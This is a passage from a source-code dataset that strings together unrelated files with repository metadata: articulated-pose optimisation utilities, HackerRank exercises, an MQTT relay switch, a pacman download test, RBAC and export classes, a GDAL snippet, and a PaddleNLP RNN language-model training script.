rfvision/models/pose_estimators/articulation/optimization/utils.py
|
mvig-robotflow/rfvision
|
cc662f213dfe5a3e8864a6b5685a668a4436e397
|
[
"Apache-2.0"
] | 1 |
2021-07-21T13:14:54.000Z
|
2021-07-21T13:14:54.000Z
|
rfvision/models/pose_estimators/articulation/optimization/utils.py
|
mvig-robotflow/rfvision
|
cc662f213dfe5a3e8864a6b5685a668a4436e397
|
[
"Apache-2.0"
] | 2 |
2021-07-16T03:25:04.000Z
|
2021-11-22T06:04:01.000Z
|
import numpy as np
from scipy.optimize import linear_sum_assignment
DIVISION_EPS = 1e-10
from scipy.spatial.transform import Rotation as srot
from scipy.optimize import least_squares
def get_3d_bbox(scale, shift = 0):
"""
Input:
scale: [3] or scalar
shift: [3] or scalar
Return
bbox_3d: [3, N]
"""
if hasattr(scale, "__iter__"):
bbox_3d = np.array([[scale[0] / 2, +scale[1] / 2, scale[2] / 2],
[scale[0] / 2, +scale[1] / 2, -scale[2] / 2],
[-scale[0] / 2, +scale[1] / 2, scale[2] / 2],
[-scale[0] / 2, +scale[1] / 2, -scale[2] / 2],
[+scale[0] / 2, -scale[1] / 2, scale[2] / 2],
[+scale[0] / 2, -scale[1] / 2, -scale[2] / 2],
[-scale[0] / 2, -scale[1] / 2, scale[2] / 2],
[-scale[0] / 2, -scale[1] / 2, -scale[2] / 2]]) + shift
else:
bbox_3d = np.array([[scale / 2, +scale / 2, scale / 2],
[scale / 2, +scale / 2, -scale / 2],
[-scale / 2, +scale / 2, scale / 2],
[-scale / 2, +scale / 2, -scale / 2],
[+scale / 2, -scale / 2, scale / 2],
[+scale / 2, -scale / 2, -scale / 2],
[-scale / 2, -scale / 2, scale / 2],
[-scale / 2, -scale / 2, -scale / 2]]) +shift
bbox_3d = bbox_3d.transpose()
return bbox_3d
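def _bbox_example():
    # Illustrative sketch, not part of the original file: the bbox of a unit cube
    # centred at the origin spans [-0.5, 0.5] on every axis. The helper name is
    # an assumption made for this example only.
    corners = get_3d_bbox(1.0)  # shape (3, 8), one corner per column
    assert corners.shape == (3, 8)
    assert np.isclose(np.abs(corners).max(), 0.5)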
def rotate_pts(source, target):
# compute rotation between source: [N x 3], target: [N x 3]
# pre-centering
source = source - np.mean(source, 0, keepdims=True)
target = target - np.mean(target, 0, keepdims=True)
M = np.matmul(target.T, source)
U, D, Vh = np.linalg.svd(M, full_matrices=True)
d = (np.linalg.det(U) * np.linalg.det(Vh)) < 0.0
if d:
D[-1] = -D[-1]
U[:, -1] = -U[:, -1]
R = np.matmul(U, Vh)
return R
def scale_pts(source, target):
# compute scaling factor between source: [N x 3], target: [N x 3]
pdist_s = source.reshape(source.shape[0], 1, 3) - source.reshape(1, source.shape[0], 3)
A = np.sqrt(np.sum(pdist_s**2, 2)).reshape(-1)
pdist_t = target.reshape(target.shape[0], 1, 3) - target.reshape(1, target.shape[0], 3)
b = np.sqrt(np.sum(pdist_t**2, 2)).reshape(-1)
scale = np.dot(A, b) / (np.dot(A, A)+1e-6)
return scale
def rot_diff_rad(rot1, rot2):
return np.arccos( ( np.trace(np.matmul(rot1, rot2.T)) - 1 ) / 2 ) % (2*np.pi)
def rot_diff_degree(rot1, rot2):
return rot_diff_rad(rot1, rot2) / np.pi * 180
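def _rotate_pts_sanity_check():
    # Illustrative sketch, not part of the original file: recover a known rotation
    # with rotate_pts. The helper name, the test rotation and the tolerance are
    # assumptions for this example; the older scipy as_dcm API is used to stay
    # consistent with the rest of this module.
    rng = np.random.RandomState(0)
    src = rng.rand(10, 3)
    R_true = srot.from_euler('xyz', [0.3, -0.2, 0.5]).as_dcm()
    tgt = np.matmul(src, R_true.T)  # tgt_i = R_true @ src_i
    R_est = rotate_pts(src, tgt)
    assert np.allclose(R_true, R_est, atol=1e-6)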
def ransac(dataset, model_estimator, model_verifier, inlier_th, niter=10000, joint_type='revolute'):
best_model = None
best_score = -np.inf
best_inliers = None
for i in range(niter):
cur_model = model_estimator(dataset, joint_type=joint_type)
cur_score, cur_inliers = model_verifier(dataset, cur_model, inlier_th)
        if cur_score > best_score:
            best_model = cur_model
            best_inliers = cur_inliers
            best_score = cur_score
best_model = model_estimator(dataset, best_inliers, joint_type=joint_type)
return best_model, best_inliers
def joint_transformation_estimator(dataset, best_inliers = None, joint_type='revolute'):
# dataset: dict, fields include source0, target0, nsource0,
# source1, target1, nsource1, joint_direction
if best_inliers is None:
sample_idx0 = np.random.randint(dataset['nsource0'], size=3)
sample_idx1 = np.random.randint(dataset['nsource1'], size=3)
else:
sample_idx0 = best_inliers[0]
sample_idx1 = best_inliers[1]
source0 = dataset['source0'][sample_idx0, :]
target0 = dataset['target0'][sample_idx0, :]
source1 = dataset['source1'][sample_idx1, :]
target1 = dataset['target1'][sample_idx1, :]
# prescaling and centering
scale0 = scale_pts(source0, target0)
scale1 = scale_pts(source1, target1)
scale0_inv = scale_pts(target0, source0) # check if could simply take reciprocal
scale1_inv = scale_pts(target1, source1)
target0_scaled_centered = scale0_inv*target0
target0_scaled_centered -= np.mean(target0_scaled_centered, 0, keepdims=True)
source0_centered = source0 - np.mean(source0, 0, keepdims=True)
target1_scaled_centered = scale1_inv*target1
target1_scaled_centered -= np.mean(target1_scaled_centered, 0, keepdims=True)
source1_centered = source1 - np.mean(source1, 0, keepdims=True)
# joint optimization
# joint_points0 = np.linspace(0, 1, num = np.min((source0.shape[0], source1.shape[0]))+1 )[1:].reshape((-1, 1))*dataset['joint_direction'].reshape((1, 3))
# joint_points1 = np.linspace(0, 1, num = np.min((source0.shape[0], source1.shape[0]))+1 )[1:].reshape((-1, 1))*dataset['joint_direction'].reshape((1, 3))
joint_points0 = np.ones_like(np.linspace(0, 1, num = np.min((source0.shape[0], source1.shape[0]))+1 )[1:].reshape((-1, 1)))*dataset['joint_direction'].reshape((1, 3))
joint_points1 = np.ones_like(np.linspace(0, 1, num = np.min((source0.shape[0], source1.shape[0]))+1 )[1:].reshape((-1, 1)))*dataset['joint_direction'].reshape((1, 3))
joint_axis = dataset['joint_direction'].reshape((1, 3))
# joint_points0 = np.linspace(0, 1, num = source1.shape[0]+1 )[1:].reshape((-1, 1))*dataset['joint_direction'].reshape((1, 3))
# joint_points1 = np.linspace(0, 1, num = source0.shape[0]+1 )[1:].reshape((-1, 1))*dataset['joint_direction'].reshape((1, 3))
R0 = rotate_pts(source0_centered, target0_scaled_centered)
R1 = rotate_pts(source1_centered, target1_scaled_centered)
rdiff0 = np.inf
rdiff1 = np.inf
niter = 100
degree_th = 0.1
isalternate = False
isdirect = False
if not isalternate:
rotvec0 = srot.from_dcm(R0).as_rotvec()
rotvec1 = srot.from_dcm(R1).as_rotvec()
# print('initialize rotvec0 vs rotvec1: \n', rotvec0, rotvec1)
if joint_type == 'prismatic':
res = least_squares(objective_eval_r, np.hstack((rotvec0, rotvec1)), verbose=0, ftol=1e-4, method='lm',
args=(source0_centered, target0_scaled_centered, source1_centered, target1_scaled_centered, joint_points0, False))
elif joint_type == 'revolute':
res = least_squares(objective_eval, np.hstack((rotvec0, rotvec1)), verbose=0, ftol=1e-4, method='lm',
args=(source0_centered, target0_scaled_centered, source1_centered, target1_scaled_centered, joint_points0, False))
R0 = srot.from_rotvec(res.x[:3]).as_dcm()
R1 = srot.from_rotvec(res.x[3:]).as_dcm()
else:
for i in range(niter):
if rdiff0<=degree_th and rdiff1<=degree_th:
break
newsrc0 = np.concatenate( (source0_centered, joint_points0), 0 )
newtgt0 = np.concatenate( (target0_scaled_centered, np.matmul( joint_points0, R1.T ) ), 0 )
newR0 = rotate_pts( newsrc0, newtgt0 )
rdiff0 = rot_diff_degree(R0, newR0)
R0 = newR0
newsrc1 = np.concatenate( (source1_centered, joint_points1), 0 )
newtgt1 = np.concatenate( (target1_scaled_centered, np.matmul( joint_points1, R0.T ) ), 0 )
newR1 = rotate_pts( newsrc1, newtgt1 )
rdiff1 = rot_diff_degree(R1, newR1)
R1 = newR1
translation0 = np.mean(target0.T-scale0*np.matmul(R0, source0.T), 1)
translation1 = np.mean(target1.T-scale1*np.matmul(R1, source1.T), 1)
# if joint_type == 'prismatic': # todo best_inliers is not None and
# res = least_squares(objective_eval_t, np.hstack((translation0, translation1)), verbose=0, ftol=1e-4, method='lm',
# args=(source0, target0, source1, target1, joint_axis, R0, R1, scale0, scale1, False))
# translation0 = res.x[:3]
# translation1 = res.x[3:]
jtrans = dict()
jtrans['rotation0'] = R0
jtrans['scale0'] = scale0
jtrans['translation0'] = translation0
jtrans['rotation1'] = R1
jtrans['scale1'] = scale1
jtrans['translation1'] = translation1
return jtrans
def joint_transformation_verifier(dataset, model, inlier_th):
# dataset: dict, fields include source, target, nsource, ntarget
# model: dict, fields include rotation, scale, translation
res0 = dataset['target0'].T - model['scale0'] * np.matmul( model['rotation0'], dataset['source0'].T ) - model['translation0'].reshape((3, 1))
inliers0 = np.sqrt(np.sum(res0**2, 0)) < inlier_th
res1 = dataset['target1'].T - model['scale1'] * np.matmul( model['rotation1'], dataset['source1'].T ) - model['translation1'].reshape((3, 1))
inliers1 = np.sqrt(np.sum(res1**2, 0)) < inlier_th
score = ( np.sum(inliers0)/res0.shape[0] + np.sum(inliers1)/res1.shape[0] ) / 2
return score, [inliers0, inliers1]
def rotate_points_with_rotvec(points, rot_vecs):
"""Rotate points by given rotation vectors.
Rodrigues' rotation formula is used.
"""
theta = np.linalg.norm(rot_vecs, axis=1)[:, np.newaxis]
with np.errstate(invalid='ignore'):
v = rot_vecs / theta
v = np.nan_to_num(v)
dot = np.sum(points * v, axis=1)[:, np.newaxis]
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
return cos_theta * points + sin_theta * np.cross(v, points) + dot * (1 - cos_theta) * v
def objective_eval(params, x0, y0, x1, y1, joints, isweight=True):
# params: [:3] R0, [3:] R1
# x0: N x 3, y0: N x 3, x1: M x 3, y1: M x 3, R0: 1 x 3, R1: 1 x 3, joints: K x 3
rotvec0 = params[:3].reshape((1,3))
rotvec1 = params[3:].reshape((1,3))
res0 = y0 - rotate_points_with_rotvec(x0, rotvec0)
res1 = y1 - rotate_points_with_rotvec(x1, rotvec1)
res_joint = rotate_points_with_rotvec(joints, rotvec0) - rotate_points_with_rotvec(joints, rotvec1)
if isweight:
res0 /= x0.shape[0]
res1 /= x1.shape[0]
res_joint /= joints.shape[0]
return np.concatenate((res0, res1, res_joint), 0).ravel()
def objective_eval_r(params, x0, y0, x1, y1, joints, isweight=True, joint_type='prismatic'):
# params: [:3] R0, [3:] R1
# x0: N x 3, y0: N x 3, x1: M x 3, y1: M x 3, R0: 1 x 3, R1: 1 x 3, joints: K x 3
rotvec0 = params[:3].reshape((1,3))
rotvec1 = params[3:].reshape((1,3))
res0 = y0 - rotate_points_with_rotvec(x0, rotvec0)
res1 = y1 - rotate_points_with_rotvec(x1, rotvec1)
res_R= rotvec0 - rotvec1
if isweight:
res0 /= x0.shape[0]
res1 /= x1.shape[0]
return np.concatenate((res0, res1, res_R), 0).ravel()
| 45.008547 | 170 | 0.618686 |
07fd1b2c7aa0339bc5336360c12584bc516707ea
| 596 |
py
|
Python
|
HackerP/introduction/if-else.py
|
JKChang2015/hackerrank
|
5e5bd6892d2e4754e73f73eecfa8f4b9f266c3bd
|
[
"MIT"
] | null | null | null |
HackerP/introduction/if-else.py
|
JKChang2015/hackerrank
|
5e5bd6892d2e4754e73f73eecfa8f4b9f266c3bd
|
[
"MIT"
] | null | null | null |
HackerP/introduction/if-else.py
|
JKChang2015/hackerrank
|
5e5bd6892d2e4754e73f73eecfa8f4b9f266c3bd
|
[
"MIT"
] | null | null | null |
# if-else
# Created by JKChang
# 14/08/2018, 10:48
# Tag:
# Description: https://www.hackerrank.com/challenges/py-if-else/problem
# Task
# Given an integer, , perform the following conditional actions:
# If n is odd, print Weird
# If n is even and in the inclusive range of 2 to 5, print Not Weird
# If n is even and in the inclusive range of 6 to 20, print Weird
# If n is even and greater than 20, print Not Weird
N = int(input())
if N % 2 != 0:
print('Weird')
elif N >= 2 and N <= 5:
print("Not Weird")
elif N >= 6 and N <= 20:
print("Weird")
elif N > 20:
print("Not Weird")
| 25.913043 | 71 | 0.659396 |
6af4f8a95d4bffa2f0750024747d51d370bb62b1
| 830 |
py
|
Python
|
Edzna/device/light.py
|
xe1gyq/veracruz
|
6094d511998705245fc9f25158cc496de5871db3
|
[
"MIT"
] | null | null | null |
Edzna/device/light.py
|
xe1gyq/veracruz
|
6094d511998705245fc9f25158cc496de5871db3
|
[
"MIT"
] | null | null | null |
Edzna/device/light.py
|
xe1gyq/veracruz
|
6094d511998705245fc9f25158cc496de5871db3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import paho.mqtt.client as paho
import time
from upm import pyupm_grove as grove
from threading import Thread
relay = grove.GroveRelay(2)
def functionDataActuatorMqttOnMessage(mosq, obj, msg):
    if msg.payload.decode() == "ON":
        relay.on()
    elif msg.payload.decode() == "OFF":
relay.off()
def functionDataActuatorMqttSubscribe():
mqttclient = paho.Client()
mqttclient.connect("iot.eclipse.org", 1883, 60)
mqttclient.subscribe("edzna/principal/light/switch", 0)
mqttclient.on_message = functionDataActuatorMqttOnMessage
while mqttclient.loop() == 0:
pass
if __name__ == '__main__':
threadmqttsubscribe = Thread(target=functionDataActuatorMqttSubscribe)
threadmqttsubscribe.start()
print "Hello Edzna @ Light"
while True:
time.sleep(5)
# End of File
| 23.055556 | 74 | 0.704819 |
ed5ad2b45c938c466e78d684f183e21c386d63e1
| 292 |
py
|
Python
|
pacman-arch/test/pacman/tests/upgrade-download-404.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade-download-404.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade-download-404.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = 'download a remote package with -U'
self.require_capability("curl")
url = self.add_simple_http_server({})
self.args = '-Uw {url}/foo.pkg'.format(url=url)
self.addrule('!PACMAN_RETCODE=0')
self.addrule('!CACHE_FEXISTS=foo.pkg')
self.addrule('!CACHE_FEXISTS=foo.pkg.sig')
| 26.545455 | 54 | 0.743151 |
ed883109701131cf59521492da50992dbb717e73
| 2,097 |
py
|
Python
|
Python/Basic_Data_Types/Nested_List.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
Python/Basic_Data_Types/Nested_List.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
Python/Basic_Data_Types/Nested_List.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
# user input
# https://www.hackerrank.com/challenges/nested-list/problem?h_r=internal-search
if __name__ == '__main__':
z = int(input())
phy = []
grd = []
for _ in range(z):
name = input().strip()
score = float(input().strip())
phy.append([name, score])
grd.append(score)
pass
phy.sort()
grd.sort()
    sco = sorted(set(grd))[1]  # second lowest *distinct* score
cou = grd.count(sco)
if cou == 1:
for i in range(len(phy)):
if sco == phy[i][1]:
key, val = phy[i]
output = [key]
print(output[0])
pass
else:
for i in range(len(phy)):
if sco == phy[i][1]:
key, val = phy[i]
output = [key]
output.sort()
for j in output:
print(j)
pass
pass
"""
5
Harry
37.21
Berry
37.21
Tina
37.2
Akriti
41
Harsh
39
"""
"""
arr = []
sc = []
# method 2
z = int(input())
arr = [[input().strip(), float(input())] for _ in range(z)]
print(arr)
"""
"""
# method 1
# for loop integration
z = int(input())
for i in range(z):
name = input().strip()
score = input().strip()
arr.append([name, score])
sc.append(score)
pass
x = 1
y = 0
mi = min(sc)
co = sc.count(mi)
# if first least is more
if co > 1:
for i in range(co):
sc.remove(mi)
pass
elif co == 1:
sc.remove(mi)
# if second least is more
mi = min(sc)
co = sc.count(mi)
# if count is more than 1
if co > 1:
output = []
for i in range(z):
val, key = arr[i][x], arr[i][y]
if val == mi:
output.append(key)
pass
output.sort()
for i in output:
print(i)
pass
# if count is equal to 1
elif co == 1:
output = []
for i in range(z):
val,key = arr[i][x],arr[i][y]
if val == mi:
output.append(key)
pass
output.sort()
for i in output:
print(i)
pass
"""
"""
Examples
5
Harry
37.2
Berry
37.21
Tina
37.2
Akriti
41
Harsh
39
"""
| 17.330579 | 79 | 0.475918 |
1354adf16fee81dd47462e4e0595a247769f4e57
| 146 |
py
|
Python
|
python_lessons/Textastic_Files/Python SQLite Tutorial - MtMk/app2.py
|
1986MMartin/coding-sections-markus
|
e13be32e5d83e69250ecfb3c76a04ee48a320607
|
[
"Apache-2.0"
] | null | null | null |
python_lessons/Textastic_Files/Python SQLite Tutorial - MtMk/app2.py
|
1986MMartin/coding-sections-markus
|
e13be32e5d83e69250ecfb3c76a04ee48a320607
|
[
"Apache-2.0"
] | null | null | null |
python_lessons/Textastic_Files/Python SQLite Tutorial - MtMk/app2.py
|
1986MMartin/coding-sections-markus
|
e13be32e5d83e69250ecfb3c76a04ee48a320607
|
[
"Apache-2.0"
] | null | null | null |
import formular
def menu():
myroot = formular.root()
    formular.form_body(myroot, name='Markus Martin - 2020', geometry="500x500")
menu()
| 14.6 | 77 | 0.678082 |
b96f0b3b1633e91d1101afa17159304c1f00a842
| 2,119 |
py
|
Python
|
rbac/common/task/relationship_owner.py
|
akgunkel/sawtooth-next-directory
|
a88833033ab30e9091479a38947f04c5e396ca46
|
[
"Apache-2.0"
] | null | null | null |
rbac/common/task/relationship_owner.py
|
akgunkel/sawtooth-next-directory
|
a88833033ab30e9091479a38947f04c5e396ca46
|
[
"Apache-2.0"
] | 1 |
2018-09-10T19:12:31.000Z
|
2018-09-10T19:12:31.000Z
|
rbac/common/task/relationship_owner.py
|
akgunkel/sawtooth-next-directory
|
a88833033ab30e9091479a38947f04c5e396ca46
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
"""Implementation of the Task-Owner relationship
Usage: rbac.task.owner.exists(task_id, user_id)
"""
import logging
from rbac.common import addresser
from rbac.common.base.base_relationship import BaseRelationship
from rbac.common.task.propose_owner import ProposeAddTaskOwner
from rbac.common.task.confirm_owner import ConfirmAddTaskOwner
from rbac.common.task.reject_owner import RejectAddTaskOwner
LOGGER = logging.getLogger(__name__)
class OwnerRelationship(BaseRelationship):
"""Implementation of the Task-Owner relationship
Usage: rbac.task.owner.exists(task_id, user_id)
"""
def __init__(self):
super().__init__()
self.propose = ProposeAddTaskOwner()
self.confirm = ConfirmAddTaskOwner()
self.reject = RejectAddTaskOwner()
@property
def address_type(self):
"""The address type from AddressSpace implemented by this class"""
return addresser.AddressSpace.TASKS_OWNERS
@property
def object_type(self):
"""The object type from AddressSpace implemented by this class"""
return addresser.ObjectType.TASK
@property
def related_type(self):
"""The related type from AddressSpace implemented by this class"""
return addresser.ObjectType.USER
@property
def relationship_type(self):
"""The related type from AddressSpace implemented by this class"""
return addresser.RelationshipType.OWNER
| 35.915254 | 79 | 0.716848 |
e072226f51f92cfe1559caecc99b5dd3a96598e4
| 2,636 |
py
|
Python
|
src/onegov/feriennet/exports/occasion.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/exports/occasion.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/exports/occasion.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.activity import Activity, Occasion, OccasionNeed
from onegov.core.security import Secret
from onegov.feriennet import FeriennetApp, _
from onegov.feriennet.exports.base import FeriennetExport
from onegov.feriennet.forms import PeriodExportForm
from sqlalchemy.orm import joinedload, undefer
@FeriennetApp.export(
id='durchfuehrungen',
form_class=PeriodExportForm,
permission=Secret,
title=_("Occasions"),
explanation=_("Exports activities with an occasion in the given period."),
)
class OccasionExport(FeriennetExport):
def run(self, form, session):
return self.rows(session, form.selected_period)
def query(self, session, period):
q = session.query(Occasion)
q = q.filter(Occasion.period_id == period.id)
q = q.options(joinedload(Occasion.activity).joinedload(Activity.user))
q = q.options(joinedload(Occasion.period))
q = q.options(undefer('*'))
q = q.order_by(Occasion.order)
return q
def rows(self, session, period):
for occasion in self.query(session, period):
yield ((k, v) for k, v in self.fields(occasion))
def fields(self, occasion):
yield from self.activity_fields(occasion.activity)
yield from self.occasion_fields(occasion)
yield from self.user_fields(occasion.activity.user)
@FeriennetApp.export(
id='bedarf',
form_class=PeriodExportForm,
permission=Secret,
title=_("Needs"),
explanation=_("Exports occasion needs."),
)
class OccasionNeedExport(FeriennetExport):
def run(self, form, session):
return self.rows(session, form.selected_period)
def query(self, session, period):
q = session.query(OccasionNeed)
q = q.filter(OccasionNeed.occasion_id.in_(
session.query(Occasion.id)
.filter(Occasion.period_id == period.id)
.subquery()
))
q = q.join(Occasion)
q = q.options(
joinedload(OccasionNeed.occasion)
.joinedload(Occasion.activity)
)
q = q.options(
joinedload(OccasionNeed.occasion)
.joinedload(Occasion.period)
)
q = q.options(undefer('*'))
q = q.order_by(Occasion.order, OccasionNeed.name)
return q
def rows(self, session, period):
for need in self.query(session, period):
yield ((k, v) for k, v in self.fields(need))
def fields(self, need):
yield from self.activity_fields(need.occasion.activity)
yield from self.occasion_fields(need.occasion)
yield from self.occasion_need_fields(need)
| 32.146341 | 78 | 0.66085 |
161a4718a27f59f00dbdb084c8228aba2a082557
| 469 |
py
|
Python
|
python/gdal_cookbook/cookbook_geometry/create_multi_point.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/gdal_cookbook/cookbook_geometry/create_multi_point.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/gdal_cookbook/cookbook_geometry/create_multi_point.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
from osgeo import ogr
multipoint = ogr.Geometry(ogr.wkbMultiPoint)
point1 = ogr.Geometry(ogr.wkbPoint)
point1.AddPoint(1251243.7361610543, 598078.7958668759)
multipoint.AddGeometry(point1)
point2 = ogr.Geometry(ogr.wkbPoint)
point2.AddPoint(1240605.8570339603, 601778.9277371694)
multipoint.AddGeometry(point2)
point3 = ogr.Geometry(ogr.wkbPoint)
point3.AddPoint(1250318.7031934808, 606404.0925750365)
multipoint.AddGeometry(point3)
print(multipoint.ExportToWkt())
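# Illustrative addition, not part of the original snippet: the same geometry can
# also be serialised to GeoJSON, which is often more convenient for web tooling.
print(multipoint.ExportToJson())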
| 27.588235 | 54 | 0.82516 |
16b4938010cec31f08db802278c4e1f91ad43779
| 654 |
py
|
Python
|
06.BinarySearch/min/B2003-M.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | 1 |
2021-11-21T06:03:06.000Z
|
2021-11-21T06:03:06.000Z
|
06.BinarySearch/min/B2003-M.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | 2 |
2021-10-13T07:21:09.000Z
|
2021-11-14T13:53:08.000Z
|
06.BinarySearch/min/B2003-M.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | null | null | null |
num , need = map(int, input().split())
arr = list(map(int, input().split()))
#sys.stdin.readline().strip()
i = 0
j = 0
check = 0
sum = 0
while i <= len(arr):
if(i != len(arr)):
if sum < need:
sum += arr[i]
i += 1
elif sum > need:
sum -= arr[j]
j += 1
else :
if sum > need:
sum -= arr[j]
j += 1
else:
i += 1
if sum == need:
check += 1
sum -= arr[j]
j += 1
#print("i", i)
#print("j" ,j)
#print("check" , check)
#print("sum",sum)
print (check)
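# Illustrative cross-check, not part of the original solution: count the same
# contiguous-subarray sums with a brute-force double loop (fine for small inputs).
# count_subarrays_bruteforce(arr, need) should equal check.
def count_subarrays_bruteforce(values, target):
    return sum(1 for a in range(len(values))
                 for b in range(a, len(values))
                 if sum(values[a:b + 1]) == target)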
| 17.210526 | 38 | 0.370031 |
4c03f05ac08e397a246b791f9839134aadf9e573
| 615 |
py
|
Python
|
pytgt/process_call.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | 1 |
2015-08-02T09:53:18.000Z
|
2015-08-02T09:53:18.000Z
|
pytgt/process_call.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | null | null | null |
pytgt/process_call.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | 2 |
2018-03-21T04:59:50.000Z
|
2019-12-03T15:54:17.000Z
|
import subprocess
# change the type of output below
def process_call_argv(argv):
    process = subprocess.Popen(argv, stdout=subprocess.PIPE, shell=False,
                               universal_newlines=True)  # text mode: readline() returns str
    output = ""
    while True:
        out = process.stdout.readline()
        if not out and process.poll() is not None: break
output += out
return (process.returncode, output)
def process_reload_argv(argv):
    process = subprocess.Popen(argv, stdout=subprocess.PIPE, shell=False,
                               universal_newlines=True)  # text mode: readline() returns str
    outlist = []
    while True:
        out = process.stdout.readline()
        if not out and process.poll() is not None: break
outlist.append(out)
return (process.returncode, outlist)
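if __name__ == '__main__':
    # Illustrative usage, not part of the original module: capture the output of
    # a simple command line by line. 'echo' is just an example command assumed
    # to be available on the system.
    returncode, lines = process_reload_argv(['echo', 'hello'])
    print(returncode, lines)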
| 29.285714 | 71 | 0.687805 |
4c2cd86a521f87f65028a699fd533401429b060a
| 2,285 |
py
|
Python
|
examples/language_model/rnnlm/train.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
examples/language_model/rnnlm/train.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
examples/language_model/rnnlm/train.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import paddle
import numpy as np
from model import RnnLm, CrossEntropyLossForLm, UpdateModel
from args import parse_args
from reader import create_data_loader
from paddlenlp.metrics import Perplexity
paddle.seed(102)
def train(args):
paddle.set_device(args.device)
data_path = args.data_path
train_loader, valid_loader, test_loader, vocab_size = create_data_loader(
batch_size=args.batch_size,
num_steps=args.num_steps,
data_path=data_path)
network = RnnLm(vocab_size=vocab_size,
hidden_size=args.hidden_size,
batch_size=args.batch_size,
num_layers=args.num_layers,
init_scale=args.init_scale,
dropout=args.dropout)
    global_norm_clip = paddle.nn.ClipGradByGlobalNorm(args.max_grad_norm)
cross_entropy = CrossEntropyLossForLm()
ppl_metric = Perplexity()
callback = UpdateModel()
scheduler = paddle.callbacks.LRScheduler(by_step=False, by_epoch=True)
model = paddle.Model(network)
learning_rate = paddle.optimizer.lr.LambdaDecay(
learning_rate=args.base_lr,
lr_lambda=lambda x: args.lr_decay**max(x + 1 - args.epoch_start_decay,
0.0),
verbose=True)
optimizer = paddle.optimizer.SGD(learning_rate=learning_rate,
parameters=model.parameters(),
                                     grad_clip=global_norm_clip)
model.prepare(optimizer=optimizer, loss=cross_entropy, metrics=ppl_metric)
if args.init_from_ckpt:
model.load(args.init_from_ckpt)
print("Loaded checkpoint from %s" % args.init_from_ckpt)
benchmark_logger = paddle.callbacks.ProgBarLogger(
log_freq=(len(train_loader) // 10), verbose=3)
model.fit(train_data=train_loader,
eval_data=valid_loader,
epochs=args.max_epoch,
shuffle=False,
callbacks=[callback, scheduler, benchmark_logger])
model.save(path='checkpoint/test') # save for training
print('Start to evaluate on test dataset...')
model.evaluate(test_loader, log_freq=len(test_loader))
if __name__ == '__main__':
args = parse_args()
train(args)
| 33.602941 | 78 | 0.659519 |
d5c4c4bf4f222c33080b0b11b56c9f08c4800284
| 3,268 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/digital_ocean_tag_info.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/digital_ocean_tag_info.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/digital_ocean_tag_info.py
|
